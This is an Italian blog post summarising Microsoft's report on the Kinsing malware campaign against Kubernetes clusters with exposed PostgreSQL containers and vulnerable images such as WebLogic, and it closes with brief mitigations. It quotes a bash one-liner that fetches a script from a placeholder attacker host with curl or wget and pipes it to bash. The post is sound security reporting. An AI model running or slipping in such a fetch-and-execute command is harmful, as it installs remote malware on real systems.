Si chiama Kinsing ed è un malware che, pur utilizzando tecniche di attacco ben conosciute, sta attaccando installazioni di Kubernetes che hanno esposto i container PostgreSQL, ovviamente mal configurati.

La parte interessante di questo malware, che è stato ampiamente descritto dal team di Microsoft Defender for Cloud è che riguarda immagini di container ritenute vulnerabili. I ricercatori ne citano alcune il cui utilizzo è quantomeno diffuso, vedi:

• PHPUnit
• Liferay
• WebLogic
• WordPress

Nel caso descritto relativo a WebLogic (piattaforma di sviluppo prodotta da Oracle) gli attacchi iniziano con la scansione di un’ampia gamma di indirizzi IP, alla ricerca di una porta aperta che corrisponda alla porta predefinita di WebLogic (7001).

Se vulnerabili, gli aggressori possono utilizzare uno degli exploit per eseguire il loro payload dannoso (Kinsing, per l’appunto). Il metodo principale che abbiamo osservato è stato l’esecuzione di un comando dannoso con la seguente struttura:

“/bin/bash -c (curl -s Attacker_IP/Payload_Name.sh||wget -q -O-Attacker_IP/Payload_Name.sh)|bash”

E da lì, come di dice, inizia la magia!

La modalità di attacco è riassunta in questo schema:

E riassume quanto abbiamo spiegato.

Per approfondimenti c’è anche l’interessante articolo “Microsoft: Kubernetes clusters hacked in malware campaign via PostgreSQL” di BleepingComputer.

Mitigazioni? Quasi è inutile ripeterle: utilizzare solo immagini certificate, evitare di utilizzare i permessi di PostgreSQL in maniera erronea, una su tutte l’esposizione diretta della porta del servizio.

Del resto, chi può essere così sciocco da esporre su internet la porta del proprio database di produzione?

Raoul Scarazzini

Da sempre appassionato del mondo open-source e di Linux nel 2009 ho fondato il portale Mia Mamma Usa Linux! per condividere articoli, notizie ed in generale tutto quello che riguarda il mondo del pinguino, con particolare attenzione alle tematiche di interoperabilità, HA e cloud.
E, sì, mia mamma usa Linux dal 2009.